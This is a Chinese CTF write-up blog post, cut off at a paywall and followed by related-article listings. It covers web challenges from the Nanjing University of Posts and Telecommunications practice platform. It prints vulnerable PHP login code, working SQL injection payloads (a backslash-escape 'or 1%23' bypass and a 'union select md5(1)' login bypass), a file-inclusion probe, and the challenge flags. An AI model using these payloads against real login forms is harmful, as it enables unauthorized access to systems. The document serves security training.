南京邮电CTF 后面的几个WEB题目 By Assassinh

最新推荐文章于 2020-09-06 16:23:19 发布
最新推荐文章于 2020-09-06 16:23:19 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35078631/article/details/76980885
版权
之前做的南邮的题目,但是一直遗留下来几个比较复杂一些的,但是前面还是有很有意思的题目,补题补题sql injection 4F12打开源码,关键代码如下#GOAL: login as admin,then get the flag;error_reporting(0);require 'db.inc.php';function clean($str){ if(get_magic_quot
摘要由CSDN通过智能技术生成

之前做的南邮的题目,但是一直遗留下来几个比较复杂一些的,但是前面还是有很有意思的题目,补题补题

sql injection 4

F12打开源码,关键代码如下

#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';

function clean($str){
   
    if(get_magic_quotes_gpc()){
        $str=stripslashes($str);
    }
    return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);

$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
    die('Invalid password!');
}

echo $flag;

想办法构造闭合,用转义符\搞定构造万能钥匙

payload
http://chinalover.sinaapp.com/web15/index.php?username=admin\&password= or 1%23

坑爹的过滤了#号,需要一定运气才能试出来…

flag:nctf{sql_injection_is_interesting}

综合题

首先看到熟悉的东西

这里写图片描述

将之丢到google chrome 中的console中跑一下,得到一个网址 

1bc29b36f623ba82aaf6724fd3b16718.php

访问这个网址发现说

这里写图片描述

猜测在它的header头部中,然后去找一下
这里写图片描述

根据提示我们看一下有没有 .bash_history发现有一个语句
这里写图片描述

按照文件名下载该文件,解压得到flag 

nctf{bash_history_means_what}

SQL注入2

查看关键代码

<html>
<head>
Secure Web Login II
</head>
<body>

<?php
if($_POST[user] && $_POST[pass]) {
   mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
      echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
?>

都提示union 了,也知道sql语句,就是想办法让查到的东西可用嘛,构造如下

user=' union select md5(1)#'&pass=1

很容易就绕过了

ntcf{union_select_is_wtf}

综合题2

当时没做出来的题目之一,比较综合吧
首先查看首页flag.php源码很快就能发现最下面有一个本CMS说明,是附带链接的,打开一看

这里写图片描述

首先是我们能得到一些信息,比如说admin的结构是 

 create table admin ( id integer, username text, userpass text, )

还有存在的文件

flag.php
config.php
passencode.php
say.php
sm.txt
so.php

而且我们注意一下它的链接!http://cms.nuptzj.cn/about.php?file=sm.txt是不是非常像文件包含?尝试着看看能不能得到有用的信息吧!

//passencode.php
<?php 
function passencode($content){
    
    $pass=urlencode($content); 
    $array=str_split($content); 
    $pass=""; 
    for($i=0;$i<count($array);$i++){
        if($pass!=
最低0.47元/天 解锁文章
Assassin__is__me
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CG CTF 南邮CTF SQL注入2
qq_43393023的博客
09-05 780
SQL注入2 分析源码 <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); //这是登录数据库的 mysql_select_db(SAE_MYSQL_DB); ...
CTFweb)中的常见php函数意义与用法
qq_52907838的博客
04-05 1380
is_numeric()函数用于检测变量是否为数字或数字字符串, 如果指定的变量是数字和数字字符串则返回 TRUE,否则返回 FALSE,注意浮点型返回空值,即 FALSE var_dump()会返回数据变量的类型和值 eval()会把字符串当作php代码 看到eval(),想到可以用命令执行漏洞 strpos() 函数用于在字符串内查找一个字符或一段指定的文本,如果在字符串中找到匹配,该函数会返回第一个匹配的字符位置。如果未找到匹配,则返回 FALSE。 strlen函...
SDUT_CTF_WEB题目writeup
至臻求学,胸怀云月
10-08 4692
平台链接http://sctf.sdutislab.cn/challenges 闲的没事做了做实验室自己搭的平台,把web题目writeup放出来签到题右键查看源代码芝麻开门 输入口令:zhimakaimen 那就输呗 结果发现 zhimakaimen是11位,但是输入框最大允许输入10位 f12改一下前端验证把最后一个n输进去,flag就出来了 层层递进看源代码之后,iframe奇怪!
CG CTF-Web-SQL注入
feng的博客
09-06 354
SQL注入1 进入题目之后先看源码,进行代码审计 <html> <head> Secure Web Login </head> <body> <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(S
CG CTF WEB SQL注入2
无限迭代中......
07-04 1458
http://4.chinalover.sinaapp.com/web6/index.php 题解: <html> <head> Secure Web Login II </head> <body> <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE...
CTFWeb各种题目的解题姿势PPT模板
02-21
CTFWeb各种题目的解题姿势PPT模板
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
CTF工具之御剑后台扫描(web).rar
09-16
1. **下载安装**:首先,你需要将"CTF工具之御剑后台扫描(web)"这个压缩包解压,然后按照说明文档进行安装。 2. **配置参数**:根据目标网站的信息,设置相应的扫描参数,如URL、端口、用户名列表等。 3. **启动...
几个简单的ctf题目,分析题为主
06-06
4. Web安全:CTF中的Web安全题目通常涵盖SQL注入、XSS(跨站脚本攻击)、CSRF(跨站请求伪造)等常见漏洞。学习Web应用程序的工作原理,理解HTTP请求和响应,熟悉OWASP(开放网络应用安全项目)列出的十大安全风险,...
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
实验31:xss之htmlspecialchars绕过演示
qq_44720671的博客
04-29 2087
htmlspecialchars绕过 htmlspecialchars()函数把预定义字符转换成HT,L实体 预定义字符为: 1、& (和 )&amp(编码) 2、” (双引号)&qupt 3、’ (单引号)&#039 4、< (小于) &It 5、> (大于) &gt 可用引号类型: ENT_COMPAT—默认,仅编码双引号 ENT...
通过两道CTF题学习过滤单引号的SQL注入
热门推荐
Lethe's Blog
03-24 1万+
0x00 前言 通常来说,在进行字符型的SQL注入时,都需要先将前面的引号等(以单引号为例)进行闭合才能执行我们构造的SQL语句,那么如果单引号被过滤了,是否还能够成功的SQL注入呢? 答案是可以,当你在判断登录时使用的是如下SQL语句: select user from user where user='$_POST[username]' and password='$_POST[passwor...
南京邮电大学网络攻防训练平台writeup
weixin_34406086的博客
01-06 3770
本文带目录版本:https://findneo.github.io/170924NuptCTFWP/ 南邮CTF平台网址: http://ctf.nuptsast.com/challenges http://ctf.nuptzj.cn/challenges WEB 签到题 nctf{flag_admiaanaaaaaaaaaaa} ctrl+u或右键查看源代码即可。在CTF比赛中,代码...
Wechall PHP Writeup
Bendawang's Blog
03-19 6516
Wechall PHP Writeup
南邮oj【web
taozijun的博客
09-07 1690
一 签到题 源码获取flag。 二 md5 collision php弱类型匹配,百度0e开头的MD5,get获得flag。 三 签到2 字符串长度限制,f12修改输入即可获得flag。 四 这题不是WEB 这题真不是web,把图下下来用记事本打开获得flag。 五 层层递进 这道题很操蛋,作者把S O 0 o 所有的组合试了一遍吧! 看源码,拼命地切换so这样的目录【并不是同...
Wechall writeup By Assassin
Assassin
08-25 1万+
不得不说wechall的题目还是挺有趣的,外国的题目感觉和国内的题目不太一样,真是学习学习了,wp持续跟新Prime Factory #_*_ coding:utf-8 _*_ import math def is_prime(num): for i in range(2,int(math.sqrt(num))+1): if num%i==0: ret
picoCTF2013 wirteup (一)
风月之夕的博客
09-08 1946
PHP3: source当中的SQL部分如下: if($_POST[user] && $_POST[pass]) { mysql_connect("localhost","php3","xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"); mysql_select_db("php3"); $user = $_POST[user]; $pass = md5(
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
实验吧ctf-web题:这个看起来有点简单
Elvira
08-22 7451
sql注入,sqlmap,union,information_schema
ctfweb题目docker镜像
最新发布
11-26
ctfweb题目"docker镜像"是指一个挑战题目,要求我们对一个Docker镜像进行分析和攻击。Docker是一种容器化技术,可以将应用、环境和关联的配置打包成一个独立的镜像。这个镜像可以在不同的环境中进行移植和运行。 对于这个ctfweb题目,我们可以首先通过命令"docker images"查看当前系统中的Docker镜像。然后,我们可以选择这个题目中的特定镜像进行分析,使用"docker inspect [镜像ID]"命令获取有关镜像的详细信息。 接下来,我们可以尝试在本地使用这个镜像来运行一个容器。可以使用"docker run [镜像ID]"命令创建一个新的容器实例,并根据题目给出的提示找出容器内的漏洞、文件、服务等信息。 从容器内部提取敏感信息的常见方法包括查找配置文件、访问数据库、分析日志文件等。另外,在容器中也可以进行一些命令执行、代码注入等漏洞利用操作,以获取更高的权限和更深入的信息。 此外,我们还可以使用一些常见的Docker安全工具,比如Docker Bench for Security、Clair、Trivy等来对容器进行漏洞扫描,识别潜在的安全问题,并找出可能存在的弱点。 当我们找到容器内的漏洞或弱点时,我们可以根据具体情况进行利用或编写脚本进行自动化攻击。在攻击过程中,我们应该遵循道德规范,不进行未授权的攻击行为。 总之,ctfweb题目"docker镜像"需要我们对Docker容器进行分析和攻击,通过理解镜像的构成和原理,掌握Docker相关的命令以及使用一些安全工具,我们可以更好地解决这个题目并获得相应的分数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值